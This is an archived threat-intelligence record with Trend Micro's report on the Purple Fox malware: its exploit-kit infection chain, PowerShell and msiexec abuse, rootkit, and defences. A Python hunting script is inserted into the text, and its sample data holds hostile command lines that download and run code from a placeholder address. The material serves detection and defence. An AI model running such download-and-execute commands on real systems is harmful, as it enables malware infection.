{
	"id": "6d9c8166-fa65-4512-b361-9b1374a9b534",
	"created_at": "2026-04-06T00:21:23.11168Z",
	"updated_at": "2026-04-10T13:13:07.404072Z",
	"deleted_at": null,
	"sha1_hash": "3b68f88d45050d80f034ef834eccadb33eac6732",
	"title": "‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 85073,
	"plain_text": "‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell\r\nPublished: 2019-09-09 · Archived: 2026-04-05 13:10:26 UTC\r\nExploit kits may no longer be as prolific as they were back when their activities were detected in the millions, but their recurring activity in the first half of 2019 indicates that they won’t be going away any time soon. The Rig exploit kit, for instance, is known for delivering various payloads — such as downloader trojans, ransomware, cryptocurrency-mining malware, and information stealers — whose arrival and delivery techniques are also constantly fine-tuned.\r\nThe Purple Fox fileless downloader malware, which was reported to have affected at least 30,000 users last year, is a recent example. Also delivered by the Rig exploit kit, Purple Fox previously used the Nullsoft Scriptable Install System (NSIS) tool to retrieve and execute its payload. We have also previously seen Purple Fox download and execute cryptocurrency-mining malware.\r\nThe new iteration of Purple Fox that we came across, also delivered by Rig, has a few new tricks up its sleeve. It retains its rootkit component, now built on publicly available code. It also eschews NSIS in favor of abusing PowerShell, making Purple Fox capable of fileless infection. Finally, it has added exploits to its infection chain, most likely as a fallback mechanism to ensure that it can still infect the system.\r\nPurple Fox is a downloader; besides retrieving and executing cryptocurrency-mining threats, it can also deliver other kinds of malware.\r\nFigure 1. 
Purple Fox’s infection chain that abuses PowerShell\r\nPurple Fox’s Infection Chain\r\nHere’s an overview of the infection chain of this new version of Purple Fox:\r\nOnce the user accesses a malicious site hosting one of Rig’s landing pages, one of three methods is used to ultimately redirect the user to a malicious PowerShell script. That script will, in turn, either directly execute Purple Fox’s main component or escalate privileges in order to download and execute a file that leads to Purple Fox:\r\n- A Flash (.swf) file that exploits CVE-2018-15982, which leads to the malicious PowerShell script.\r\n- Two .htm files that exploit CVE-2014-6332, a vulnerability in Internet Explorer’s VBScript engine, and CVE-2018-8174, a remote code execution (RCE) vulnerability in the VBScript engine affecting various Windows versions (note that both vulnerabilities have long been patched). The .htm file containing the exploit for CVE-2018-8174 redirects to an HTML application (.hta) file.\r\n- The .hta file, which redirects to the malicious PowerShell script.\r\nIf the current user account on the affected system has administrative access, the malicious PowerShell script, posing as an image (.jpg) file, abuses the application programming interface (API) of msi.dll — a dynamic-link library (DLL) that contains functions for installing Microsoft Installer (.msi) packages — in order to execute and install Purple Fox’s main component, which also poses as a randomly named image file.\r\nIf the current user account does not have administrative access, the PowerShell script instead abuses a PowerSploit module (normally used by penetration testers) that, in turn, exploits two vulnerabilities: CVE-2015-1701 and CVE-2018-8120. 
Both of these are privilege escalation flaws in win32k.sys, the kernel-mode driver behind the Windows graphical subsystem.\r\nOnce the script successfully exploits one of these vulnerabilities, it gains elevated privileges, which it uses to abuse msiexec.exe (the command-line executable that installs or modifies .msi packages) to download and execute Purple Fox’s main component.\r\nFigure 2. Snapshots of code showing: the .hta file, which leads to the malicious PowerShell script (top); how msi.dll is abused (center); and how msiexec.exe is abused to download and execute Purple Fox’s main component (bottom)\r\nPurple Fox’s Payload Delivery and Rootkit Component\r\nThe malware uses msi.dll’s MsiInstallProductA function to download and execute its payload — an .msi file that contains encrypted shellcode as well as 32-bit and 64-bit versions of the payload. Once executed, the malware restarts the system and uses the PendingFileRenameOperations registry value (under HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager, where the OS stores the names of files it will rename or delete at the next restart) to rename its components.\r\nIt then uses its rootkit capability (hiding its files and registry entries) after the system has restarted. It creates a suspended svchost.exe process and injects a DLL, which in turn creates a driver with the rootkit capability. Before proceeding further to the payload, the injected DLL sets up the following: a driver file (dump_{random hex}.sys), which is responsible for the rootkit capability; and its main component in the form of a DLL file (Ms{random hex}App.dll).\r\nUnlike the previous version of Purple Fox, however, this new iteration abuses open-source code to implement its rootkit components, which include hiding and protecting its files and registry entries. Also of note is the way this new version of Purple Fox uses a file-protection utility to obfuscate its DLL component, which deters reverse engineering or cracking attempts.\r\nFigure 3. 
Snapshot of code showing how Purple Fox abuses open-source code to hide and protect its components and registry entries\r\nBest practices and Trend Micro solutions\r\nPurple Fox exemplifies what we’re seeing in this year’s threat landscape: a multilayered approach to “living off the land.” Purple Fox’s emphasis on leaving a small footprint is also notable, with its abuse of legitimate tools (PowerShell, msi.dll, and msiexec.exe) and use of fileless techniques (e.g., DLL injection). Purple Fox also uses exploits for vulnerabilities with available patches. Its attack chain, for instance, exploits a vulnerability (CVE-2014-6332) that was disclosed and patched five years ago. This highlights the significance of patching, especially for enterprises. And given how Purple Fox can deliver virtually any kind of threat, a defense-in-depth approach to securing online infrastructure is important. 
Here are some best practices that users and organizations can adopt:\r\n- Enforce the principle of least privilege by restricting and securing the use of tools reserved for system administrators.\r\n- Regularly patch and update (or employ virtual patching for legacy or embedded systems or software).\r\n- Deploy additional layers of security, such as behavior monitoring, which stops malware-related routines from executing on the system; sandboxes, which can quarantine malicious files and further analyze suspicious behaviors; and firewalls and intrusion prevention and detection systems, which can deter incursions or flag data exfiltration attempts.\r\n- Cultivate cybersecurity awareness at home and in the workplace, especially against email-borne threats that fileless malware can use as attack vectors or entry points.\r\nTrend Micro endpoint solutions such as the Smart Protection Suites and Worry-Free Business Security solutions, which have behavior monitoring capabilities, can protect users and businesses from these types of threats by detecting malicious files, scripts, and messages as well as blocking all related malicious URLs. Trend Micro Apex One™ protection employs a variety of threat detection capabilities, notably behavioral analysis, which protect against malicious scripts, injection, ransomware, and memory and browser attacks related to fileless threats.\r\nThe Trend Micro™ Deep Discovery Inspector solution protects customers from the Rig exploit kit and Purple Fox via these DDI rules:\r\n- 3286: RIG - Exploit Kit - HTTP (Request)\r\n- 4220: RIG - Exploit Kit - HTTP (Request)\r\nThe indicators of compromise (IoCs) are in this appendix. 
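\r\nThe two host-side traces described above (msiexec.exe or PowerShell fetching a remote payload that poses as an image, and the PendingFileRenameOperations entries that put dump_{random hex}.sys and Ms{random hex}App.dll in place at reboot) can be checked for with a short hunting script. The following is an added example written for this page, not code from the Trend Micro post or from Purple Fox: the process records follow Sysmon Event ID 1 field names, but every record, command line, path and the 203.0.113.10 address is constructed, and the regular expressions (a purely hexadecimal run after dump_ and between Ms and App) are this example's assumption about what the post calls random hex.

```python
# Added hunting example for this page (not code from the Trend Micro post or
# from Purple Fox). It flags two traces described in the write-up over
# constructed sample data:
#   1. msiexec.exe told to install a package from an http(s) URL, and
#      powershell.exe fetching code from a URL that poses as an image file;
#   2. PendingFileRenameOperations entries that place the rootkit driver
#      (dump_{hex}.sys) or the main DLL (Ms{hex}App.dll) at the next reboot.
# Field names follow Sysmon Event ID 1 (Image, CommandLine); every record,
# path, command line and the 203.0.113.10 address below is constructed.
import ntpath
import re

# A URL token ends at whitespace, a quote, a closing paren or a semicolon
# (\u0027 is the single quote).
URL_RE = re.compile('(?i)https?://[^ \"\u0027);]+')
IMAGE_EXT_RE = re.compile('(?i)[.](jpe?g|png|gif|bmp)([?]|$)')
# Windows itself keeps crash-dump helper drivers such as dump_diskdump.sys in
# the drivers directory, so the match requires a purely hexadecimal suffix.
# The hex-only pattern is this example's reading of the post's random hex.
ROOTKIT_DRIVER_RE = re.compile('(?i)^dump_[0-9a-f]{6,}[.]sys$')
MAIN_DLL_RE = re.compile('(?i)^ms[0-9a-f]{6,}app[.]dll$')
DOWNLOAD_HINTS = ('downloadstring', 'downloadfile', 'invoke-webrequest',
                  'invoke-restmethod', 'iwr ', 'irm ', 'iex')

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {'Image': 'C:\\Windows\\System32\\msiexec.exe',
     'CommandLine': 'msiexec.exe /i http://203.0.113.10/update/a1b2c3.jpg /q'},
    {'Image': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'CommandLine': 'powershell -nop -w hidden -c IEX((New-Object Net.WebClient)'
                    '.DownloadString(\"http://203.0.113.10/7f3e9a.jpg\"))'},
    {'Image': 'C:\\Windows\\System32\\msiexec.exe',
     'CommandLine': 'msiexec.exe /i C:\\Users\\Alice\\Downloads\\7zip.msi /qn'},
    {'Image': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'CommandLine': 'powershell -File C:\\Scripts\\Backup.ps1'},
]


def suspicious_process(event):
    '''Return a reason string if the process record matches an indicator, else None.'''
    image = ntpath.basename(event['Image']).lower()
    cmd = event['CommandLine']
    urls = URL_RE.findall(cmd)
    if image == 'msiexec.exe' and urls:
        # A URL as the package argument makes msiexec download it before installing.
        return 'msiexec installing remote package ' + urls[0]
    if image in ('powershell.exe', 'pwsh.exe'):
        lowered = cmd.lower()
        fetches = any(hint in lowered for hint in DOWNLOAD_HINTS)
        disguised = [u for u in urls if IMAGE_EXT_RE.search(u)]
        if fetches and disguised:
            return 'powershell fetching code disguised as image ' + disguised[0]
    return None


def scan_processes(events):
    '''Return (command line, reason) for every record that matches.'''
    hits = []
    for event in events:
        reason = suspicious_process(event)
        if reason:
            hits.append((event['CommandLine'], reason))
    return hits


# REG_MULTI_SZ read as a list of strings: entries come in (source, target)
# pairs, sources carry the NT object-manager prefix, and an empty target
# means the source is deleted at boot rather than renamed.
SAMPLE_PENDING_RENAMES = [  # constructed
    '\\??\\C:\\Windows\\Temp\\~DF3A9C.tmp', '\\??\\C:\\Windows\\System32\\drivers\\dump_3f2a9c1e.sys',
    '\\??\\C:\\Windows\\Temp\\~DF3A9D.tmp', '\\??\\C:\\Windows\\System32\\Ms3f2a9c1eApp.dll',
    '\\??\\C:\\Program Files\\Vendor\\old.dll', '',
    '\\??\\C:\\Windows\\System32\\drivers\\dump_diskdump.sys', '',
]


def pending_rename_pairs(values):
    '''Group the MULTI_SZ list into (source, target) pairs; a dangling trailing entry is dropped.'''
    it = iter(values)
    return list(zip(it, it))


def suspicious_pending_renames(values):
    '''Return (source, target) pairs whose target name matches the rootkit
    driver or main DLL naming pattern described in the post.'''
    hits = []
    for source, target in pending_rename_pairs(values):
        name = ntpath.basename(target)
        if ROOTKIT_DRIVER_RE.match(name) or MAIN_DLL_RE.match(name):
            hits.append((source, target))
    return hits


if __name__ == '__main__':
    for cmd, reason in scan_processes(SAMPLE_EVENTS):
        print('[process]', reason)
    for source, target in suspicious_pending_renames(SAMPLE_PENDING_RENAMES):
        print('[pending rename]', source, '->', target)
```

On a live host the process records come from Sysmon Event ID 1 (or Windows Security event 4688 with command-line auditing enabled) and the rename list from the REG_MULTI_SZ value PendingFileRenameOperations under HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager, read for instance with Get-ItemProperty. The hex-only check matters because Windows creates crash-dump helper drivers such as dump_diskdump.sys in the drivers directory, which a bare dump_*.sys match would flag; the sample data includes one to show it is skipped.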
\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/"
	],
	"report_names": [
		"purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434883,
	"ts_updated_at": 1775826787,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3b68f88d45050d80f034ef834eccadb33eac6732.pdf",
		"text": "https://archive.orkl.eu/3b68f88d45050d80f034ef834eccadb33eac6732.txt",
		"img": "https://archive.orkl.eu/3b68f88d45050d80f034ef834eccadb33eac6732.jpg"
	}
}